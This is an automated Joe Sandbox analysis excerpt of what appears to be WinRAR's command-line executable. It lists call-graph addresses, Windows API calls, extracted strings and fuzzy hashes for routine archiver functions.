7ff6ee78aac0 39568->39502 39571 7ff6ee78e32c 8 API calls 3 library calls 39568->39571 39569->39568 39596 7ff6ee7966c0 39569->39596 39571->39502 39573 7ff6ee78eb10 39572->39573 39575 7ff6ee78eb41 39573->39575 39577 7ff6ee78e30b 39573->39577 39580 7ff6ee78e678 39573->39580 39585 7ff6ee78eb50 DeleteCriticalSection 39575->39585 39577->39563 39578 7ff6ee78e8a4 8 API calls 3 library calls 39577->39578 39578->39565 39579->39563 39586 7ff6ee78e34c 39580->39586 39583 7ff6ee78e6cf InitializeCriticalSectionAndSpinCount 39584 
7ff6ee78e6bb 39583->39584 39584->39573 39585->39577 39587 7ff6ee78e3b2 39586->39587 39589 7ff6ee78e3ad 39586->39589 39587->39583 39587->39584 39588 7ff6ee78e3e5 LoadLibraryExW 39588->39589 39591 7ff6ee78e40b GetLastError 39588->39591 39589->39587 39589->39588 39592 7ff6ee78e47a 39589->39592 39595 7ff6ee78e458 FreeLibrary 39589->39595 39590 7ff6ee78e489 GetProcAddress 39590->39587 39593 7ff6ee78e4a1 39590->39593 39591->39589 39594 7ff6ee78e416 LoadLibraryExW 39591->39594 39592->39587 39592->39590 39593->39587 39594->39589 39595->39589 39607 7ff6ee796938 EnterCriticalSection 39596->39607 39598 7ff6ee7966d0 39599 7ff6ee798050 32 API calls 39598->39599 39601 7ff6ee7966d9 39599->39601 39600 7ff6ee7966e7 39603 7ff6ee796998 fflush LeaveCriticalSection 39600->39603 39601->39600 39602 7ff6ee7964d0 34 API calls 39601->39602 39604 7ff6ee7966e2 39602->39604 39605 7ff6ee7966f3 39603->39605 39606 7ff6ee7965bc GetStdHandle GetFileType 39604->39606 39605->39569 39606->39600 39609 7ff6ee79273a 39608->39609 39620 7ff6ee794b14 39609->39620 39612 7ff6ee794a74 __free_lconv_num 15 API calls 39613 7ff6ee792767 39612->39613 39614 7ff6ee794b14 __vcrt_getptd_noexit 15 API calls 39613->39614 39618 7ff6ee792791 39613->39618 39616 7ff6ee792783 39614->39616 39617 7ff6ee794a74 __free_lconv_num 15 API calls 39616->39617 39617->39618 39619 7ff6ee79279a 39618->39619 39627 7ff6ee796db4 6 API calls __vcrt_uninitialize_ptd 39618->39627 39619->39506 39625 7ff6ee794b25 __vcrt_getptd_noexit 39620->39625 39621 7ff6ee794b5a RtlAllocateHeap 39623 7ff6ee792759 39621->39623 39621->39625 39622 7ff6ee794b76 39628 7ff6ee794f3c 15 API calls memcpy_s 39622->39628 39623->39612 39625->39621 39625->39622 39626 7ff6ee7936c0 new 2 API calls 39625->39626 39626->39625 39627->39618 39628->39623 39636 7ff6ee78b6d8 SetUnhandledExceptionFilter 39629->39636 39637->39513 39639 7ff6ee767e45 39638->39639 39640 7ff6ee77b496 GetProcAddress 39638->39640 39643 7ff6ee747a68 39639->39643 39641 7ff6ee77b4cb GetProcAddress 39640->39641 
39642 7ff6ee77b4ae 39640->39642 39641->39639 39642->39641 39644 7ff6ee747a76 39643->39644 39664 7ff6ee792ae4 39644->39664 39646 7ff6ee747a80 39647 7ff6ee792ae4 setbuf 60 API calls 39646->39647 39648 7ff6ee747a94 39647->39648 39673 7ff6ee747b44 GetStdHandle GetFileType 39648->39673 39651 7ff6ee747b44 3 API calls 39652 7ff6ee747aae 39651->39652 39653 7ff6ee747b44 3 API calls 39652->39653 39655 7ff6ee747abe 39653->39655 39654 7ff6ee747b12 39663 7ff6ee74cd78 SetConsoleCtrlHandler 39654->39663 39657 7ff6ee747aeb 39655->39657 39676 7ff6ee792abc 31 API calls 2 library calls 39655->39676 39657->39654 39678 7ff6ee792abc 31 API calls 2 library calls 39657->39678 39658 7ff6ee747adf 39677 7ff6ee792b40 33 API calls 3 library calls 39658->39677 39661 7ff6ee747b06 39679 7ff6ee792b40 33 API calls 3 library calls 39661->39679 39665 7ff6ee792ae9 39664->39665 39666 7ff6ee797ee8 39665->39666 39669 7ff6ee797f23 39665->39669 39680 7ff6ee794f3c 15 API calls memcpy_s 39666->39680 39668 7ff6ee797eed 39681 7ff6ee794e1c 31 API calls _invalid_parameter_noinfo 39668->39681 39682 7ff6ee797d98 60 API calls 2 library calls 39669->39682 39672 7ff6ee797ef8 39672->39646 39674 7ff6ee747b61 GetConsoleMode 39673->39674 39675 7ff6ee747a9e 39673->39675 39674->39675 39675->39651 39676->39658 39677->39657 39678->39661 39679->39654 39680->39668 39681->39672 39682->39672 39683 7ff6ee79231c 39684 7ff6ee792342 GetModuleHandleW 39683->39684 39685 7ff6ee79238c 39683->39685 39684->39685 39692 7ff6ee79234f 39684->39692 39700 7ff6ee796938 EnterCriticalSection 39685->39700 39687 7ff6ee79243b 39688 7ff6ee796998 fflush LeaveCriticalSection 39687->39688 39689 7ff6ee792460 39688->39689 39691 7ff6ee79246c 39689->39691 39695 7ff6ee792488 11 API calls 39689->39695 39690 7ff6ee792410 39693 7ff6ee792428 39690->39693 39697 7ff6ee7946b4 32 API calls 39690->39697 39692->39685 39701 7ff6ee7924d4 GetModuleHandleExW 39692->39701 39698 7ff6ee7946b4 32 API calls 39693->39698 39694 7ff6ee7943b8 16 API calls 39694->39690 39695->39691 
39697->39693 39698->39687 39699 7ff6ee792396 39699->39687 39699->39690 39699->39694 39702 7ff6ee7924fe GetProcAddress 39701->39702 39703 7ff6ee792525 39701->39703 39702->39703 39704 7ff6ee792518 39702->39704 39705 7ff6ee79252f FreeLibrary 39703->39705 39706 7ff6ee792535 39703->39706 39704->39703 39705->39706 39706->39685 39707 7ff6ee733b53 39708 7ff6ee733b64 39707->39708 39757 7ff6ee751e80 39708->39757 39709 7ff6ee733c09 39769 7ff6ee7523f0 39709->39769 39711 7ff6ee733c18 39774 7ff6ee738050 157 API calls 39711->39774 39712 7ff6ee733bb6 39712->39709 39712->39711 39715 7ff6ee733c01 39712->39715 39714 7ff6ee733c90 39784 7ff6ee77d400 48 API calls 39714->39784 39717 7ff6ee751c24 12 API calls 39715->39717 39716 7ff6ee733c3d 39775 7ff6ee738010 13 API calls 39716->39775 39717->39709 39719 7ff6ee733ccc 39719->39714 39782 7ff6ee752414 61 API calls 39719->39782 39720 7ff6ee733c45 39723 7ff6ee733c54 39720->39723 39776 7ff6ee74cba8 75 API calls 39720->39776 39777 7ff6ee73a9d4 186 API calls wcschr 39723->39777 39724 7ff6ee733cf9 39783 7ff6ee751998 138 API calls 39724->39783 39728 7ff6ee733c5c 39778 7ff6ee7393ac 8 API calls 39728->39778 39729 7ff6ee733d10 39731 7ff6ee7518ac 15 API calls 39729->39731 39731->39714 39732 7ff6ee733c66 39733 7ff6ee733c77 39732->39733 39779 7ff6ee74ca40 61 API calls _CxxThrowException 39732->39779 39780 7ff6ee738090 8 API calls 39733->39780 39737 7ff6ee733c7f 39737->39714 39781 7ff6ee74ca40 61 API calls _CxxThrowException 39737->39781 39758 7ff6ee751e95 setbuf 39757->39758 39759 7ff6ee751ecb CreateFileW 39758->39759 39760 7ff6ee751f59 GetLastError 39759->39760 39761 7ff6ee751fb8 39759->39761 39762 7ff6ee764534 10 API calls 39760->39762 39763 7ff6ee751fd9 SetFileTime 39761->39763 39765 7ff6ee751ff7 39761->39765 39764 7ff6ee751f74 39762->39764 39763->39765 39764->39761 39767 7ff6ee751f78 CreateFileW GetLastError 39764->39767 39766 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39765->39766 39768 7ff6ee75203a 39766->39768 39767->39761 39768->39712 39785 
7ff6ee7524e8 39769->39785 39772 7ff6ee75240e 39772->39719 39774->39716 39775->39720 39777->39728 39778->39732 39779->39733 39780->39737 39781->39714 39782->39724 39783->39729 39791 7ff6ee751af0 39785->39791 39788 7ff6ee7523f9 39788->39772 39790 7ff6ee74ca40 61 API calls _CxxThrowException 39788->39790 39790->39772 39792 7ff6ee751b01 setbuf 39791->39792 39793 7ff6ee751b6f CreateFileW 39792->39793 39794 7ff6ee751b68 39792->39794 39793->39794 39795 7ff6ee764534 10 API calls 39794->39795 39797 7ff6ee751be1 39794->39797 39796 7ff6ee751bb3 39795->39796 39796->39797 39798 7ff6ee751bb7 CreateFileW 39796->39798 39799 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39797->39799 39798->39797 39800 7ff6ee751c14 39799->39800 39800->39788 39801 7ff6ee74ca08 10 API calls 39800->39801 39801->39788
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 6e1dde0df9ed8f5b1783e6a3c8e388e799251ecd57c159bc9482710f1cd15309
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: 46C2C363A0C59281EF24DE64D0443BD26A1EB21784F574036EA0EC62C5DEFFE966C35B
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: b8cb1c8fb26abeda722d0fd2213bcde0153c5d502918ca5fc30dbf398b96c1a4
• Instruction ID: 69169f29cc68de7b1e2f00c09f8d82cd25782b55699c90de2523bef034ba936a
• Opcode Fuzzy Hash: b8cb1c8fb26abeda722d0fd2213bcde0153c5d502918ca5fc30dbf398b96c1a4
                                                                                                                                                                      • Instruction Fuzzy Hash: BBE2E223A09AC285EF60DF25D8483FD27A1FB65788F460031EA4D87796DFBAD564C306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• API String ID: 2520153904-1675521814
• Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
• Instruction ID: 65acf57751b2f7a8a46ff1c52bb82b8c8818dab9723633284f8e18d980e3f094
• Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
• Instruction Fuzzy Hash: A531943371864285FF649B21E8443E83364FB64785F424035F98D83698EFBED9A5CB0A
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE754736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE75476B
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE75477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE7547A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE7547B2
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
• Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction ID: a1b646f3217c91f74d21b73097d316080388608e16bb140c2a9d64953b45d7db
• Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction Fuzzy Hash: 6141B03360868156EF249B25E4403E863A0FB697B4F010735FA7D832C5EFADE1A8C705
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction ID: 60c82ed251d4b31ca502e16a7ae0d9d7dd6bc104c98305d8117e7ae9828af31b
• Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction Fuzzy Hash: 71016226B4865182EB108B16F44433AA762EBD4FD0F198431EE4D83768CFBED956C705
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
• String ID:
• API String ID: 59578552-0
• Opcode ID: 1e255eaa320fee0010fb313d8f9fe48372c1eaef3e81e1b8682bab5b00697f51
• Instruction ID: 7e9f161c24704196ace3efa968306d8e82fd3fff9c8d1cffa4dd3854199ab128
• Opcode Fuzzy Hash: 1e255eaa320fee0010fb313d8f9fe48372c1eaef3e81e1b8682bab5b00697f51
• Instruction Fuzzy Hash: 2FE01232E1E08382EF1836A588962B814911F68320F630235F118C12C2EE9F60F28A1F
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Char
• String ID:
• API String ID: 751630497-0
• Opcode ID: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
• Instruction ID: e0677a6d7566b3f2ffe1c2adf006fbd7b03d9d3faf2a78bac12808edf7be2332
• Opcode Fuzzy Hash: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
• Instruction Fuzzy Hash: 7022E233A0868296EB50DF30D4442FE7BA0FB60748F494032EA8D87699DFB9E961C755
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e63de1587b23c38c21d4011fcacfed10454f52ca1ed5247f9ca354383f4c6a53
• Instruction ID: 442473f88d6251d8019fa4cc1b561e017b053f1b46cb69dfd8ddcc7b8688c558
• Opcode Fuzzy Hash: e63de1587b23c38c21d4011fcacfed10454f52ca1ed5247f9ca354383f4c6a53
• Instruction Fuzzy Hash: 55712533A0568186DB44DF29E4053EC3391F798B94F054135EB9CCB399DFB9A062C799
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not captured; function at 7ff6ee773ea8)
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: a090c3fb5f13b25c423c6cb206785e87dc2f8f8472672048dfb234bb33d1bd14
• Instruction ID: 6afa401847af0ac696359900c8ab7e87bedfead65d8ccd19709b25516d5a8a79
• Opcode Fuzzy Hash: a090c3fb5f13b25c423c6cb206785e87dc2f8f8472672048dfb234bb33d1bd14
• Instruction Fuzzy Hash: 2422F523A1868294EF20DB15D4403B92361FF60785F824135FA5EC76D5EFBEE9A4C70A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not captured; function at 7ff6ee744fd0)
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: cc08f902b5a2a1424913726875cc7af2d4639937dafd8e8de16a6b9cb434b07a
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 63C1A863A2C98250EF649A25C8513FC2351EF66785F464033F94DCA5DADEAEE522C30B
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1564 7ff6ee777f24-7ff6ee777f5c 1565 7ff6ee777fd0 1564->1565 1566 7ff6ee777f5e-7ff6ee777f64 1564->1566 1568 7ff6ee777fd7-7ff6ee777fea 1565->1568 1566->1565 1567 7ff6ee777f66-7ff6ee777f7c call 7ff6ee77b3f0 1566->1567 1578 7ff6ee777fb5 1567->1578 1579 7ff6ee777f7e-7ff6ee777fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1570 7ff6ee777fec-7ff6ee777fef 1568->1570 1571 7ff6ee778036-7ff6ee778039 1568->1571 1573 7ff6ee77805c-7ff6ee778065 GetCurrentProcessId 1570->1573 1575 7ff6ee777ff1-7ff6ee778000 1570->1575 1571->1573 1574 7ff6ee77803b-7ff6ee77804a 1571->1574 1576 7ff6ee778077-7ff6ee778093 1573->1576 1577 7ff6ee778067 1573->1577 1585 7ff6ee77804f-7ff6ee778051 1574->1585 1584 7ff6ee778005-7ff6ee778007 1575->1584 1580 7ff6ee778069-7ff6ee778075 1577->1580 1581 7ff6ee777fbc-7ff6ee777fce 1578->1581 1579->1581 1580->1576 1580->1580 1581->1568 1584->1576 1587 7ff6ee778009 1584->1587 1585->1576 1586 7ff6ee778053-7ff6ee77805a 1585->1586 1588 7ff6ee778010-7ff6ee778034 call 7ff6ee74ca6c call 7ff6ee74cda4 call 7ff6ee74ca40 1586->1588 1587->1588 1588->1576
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 4ca7e10cec0be59e407fb0aae14e4bd9b49d1ec7373710b096162b9562016ca5
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: 15416B27B4865380FF009B52E90063567A1AF65BD5F4A0135EC6D87794DEBEE062C70A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: 984a81de35c43f9a73fbd63f00b2957759b9056708657a8d58623a7a212ca7d6
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: E7315B27E081A381EF14AB25E4513B92791AF75784F460434FA4DCB697EEAFA424C24E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE7747DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE774831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE774853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE7748A6
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: ea9d8f2a3e07bd5d6a6861ee285eb9a98de5e145f3d1c11656418119e6c752d4
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: A831B223B18A8241EF609B61E8003BA6351FFA4794F414131FE4D87BD9EFADD164CB05
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7643D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE764402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE76440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE76443E
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
